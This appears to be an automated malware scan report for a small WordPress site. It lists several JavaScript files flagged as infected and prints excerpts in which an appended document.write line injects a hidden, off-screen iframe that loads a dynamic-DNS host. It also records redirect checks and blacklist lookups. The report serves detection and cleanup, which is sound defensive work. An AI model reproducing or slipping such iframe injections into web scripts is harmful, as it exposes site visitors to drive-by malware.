Scanned pages/files
Request | Server response | Status |
http://brianwhiteconsulting.com/ | 200 OK Content-Length: 15894 Content-Type: text/html | clean |
http://brianwhiteconsulting.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 95039 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createE ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://brianwhiteconsulting.com/wp-content/themes/BusinessCard/js/jquery.cycle.all.min.js?ver=3.4 | 200 OK Content-Length: 28058 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){var ver="2.65";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length==0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero ele ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://brianwhiteconsulting.com/wp-content/themes/BusinessCard/js/jquery.easing.1.3.js | 200 OK Content-Length: 8275 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://brianwhiteconsulting.com/wp-content/themes/BusinessCard/js/jquery.fancybox-1.2.6.pack.js | 200 OK Content-Length: 9700 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(';(p($){$.q.1Q=p(){J O.2n(p(){n b=$(O).u(\'2o\');8(b.1d(/^3i\\(["\']?(.*\\.2p)["\']?\\)$/i)){b=3j.$1;$(O).u({\'2o\':\'3k\',\'1e\':"3l:3m.3n.3o(3p=D, 3q="+($(O).u(\'3r\' Antivirus reports:
| ||
http://brianwhiteconsulting.com/wp-includes/js/jquery/jquery.form.js?ver=2.73 | 200 OK Content-Length: 11294 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(b){b.fn.ajaxSubmit=function(t){if(!this.length){a("ajaxSubmit: skipping submit process - no element selected");return this}if(typeof t=="function"){t={success:t}}var h=this.attr("action");var d=(typeof h==="string")?b.trim(h):"";if(d){d=(d.match(/^([^#]+)/)||[])[1]}d=d||window.location.href||"";t=b.extend(true,{url:d,success:b.ajaxSettings.success,type:this[0].getAttribute("method")||"GET",iframeSrc:/^https/i.test(window.location.href||"")?"javascript:false":"about:blank"},t);var u={}; Antivirus reports:
| ||
http://brianwhiteconsulting.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.2 | 200 OK Content-Length: 4772 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() {
try { jQuery('div.wpcf7 > form').ajaxForm({ beforeSubmit: wpcf7BeforeSubmit, dataType: 'json', success: wpcf7ProcessJson }); } catch (e) { } try { jQuery('div.wpcf7 > form').each(function(i, n) { wpcf7ToggleSubmit(jQuery(n)); }); } catch (e) { } try { if (_wpcf7.cached) { jQuery('div.wpcf7 > form').each(function(i, n) { jQuery('div.wpcf7-response-output').hide().empty().removeClass('wpcf7-mail-sent-ok wpcf7-mail-sent-ng wpcf7-validation-errors wpcf7-spam-blocked'); jQuery('span.wpcf7-not-valid-tip').remove(); jQuery('img.ajax-loader').css({ visibility: 'hidden' }); };document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://brianwhiteconsulting.com/test404page.js | 404 Not Found Content-Length: 15860 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: brianwhiteconsulting.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Apr 2014 16:20:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://brianwhiteconsulting.com/xmlrpc.php
GET / HTTP/1.1
Host: brianwhiteconsulting.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Apr 2014 16:20:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://brianwhiteconsulting.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: brianwhiteconsulting.com
Referer: http://www.google.com/search?q=brianwhiteconsulting.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: brianwhiteconsulting.com
Referer: http://www.google.com/search?q=brianwhiteconsulting.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brianwhiteconsulting.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brianwhiteconsulting.com/
Result: brianwhiteconsulting.com is not infected or malware details are not published yet.
Result: brianwhiteconsulting.com is not infected or malware details are not published yet.